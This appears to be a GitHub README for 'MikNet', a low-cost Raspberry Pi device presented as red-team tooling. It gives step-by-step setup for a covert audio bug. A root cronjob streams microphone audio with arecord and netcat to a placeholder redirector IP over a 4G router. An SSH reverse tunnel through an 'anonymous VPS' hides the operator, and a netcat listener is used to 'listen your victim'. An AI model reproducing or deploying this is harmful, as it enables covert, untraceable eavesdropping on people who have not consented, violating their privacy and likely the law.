/MikNet

Autonomous red team implementation allowing sound capture and broadcast through an untraceable front-end server to the attacker's station

GNU General Public License v3.0GPL-3.0

MikNet


Autonomous red team implementation allowing sound capture and broadcast through an untraceable front-end server to the attacker's station



Presentation


Video tutorial here :


Hardware



Total cost : less than 100 €

Instructions


- Install raspbian Os on the SD card (https://www.raspberrypi.com/software)
- At first boot, configure your password and enable ssh (not mandatory)
- Create a cronjob by editing the /etc/crontab file and adding this line at the end :
* * * * * root pgrep -x arecord >/dev/null && echo "Process found" || arecord -vv | nc YOUR_REDIRECTOR_PUBLIC_IP_ADDRESS 8080
- Configure your wireless 4G router access point configuration by replacing the content of the file /etc/wpa_supplicant/wpa_supplicant.conf :
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev update_config=1 country=FR network={ ssid="MY_4G_ROUTER" psk="SuPeRpAsSwOrD" key_mgmt=WPA-PSK }
- Configure the wifi interface of the raspberry to connect to the 4G router by editing the /etc/network/interfaces file and adding this line at the end :
allow-hotplug wlan0 iface wlan0 inet dhcp wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
- Put the SD card into the Raspberry and power up both the 4G router and Raspberry with attached microphone
- Start the anonymous VPS and allow TCP 8080 port
- Redirect your VPS port to a local port with the command :
ssh -NR 8080:127.0.0.1:8080 YOU_VPS_USER@YOU_VPS_PUBLIC_IP_ADDRESS
(If the forwarding is not allowed, verify that AllowTcpForwarding and GatewayPorts are set to "yes" in your /etc/ssh/sshd_config and restart the demon)
- Listen your victim by catching the audio transmitted by netcat :
nc -nlvp 8080 | aplay -vv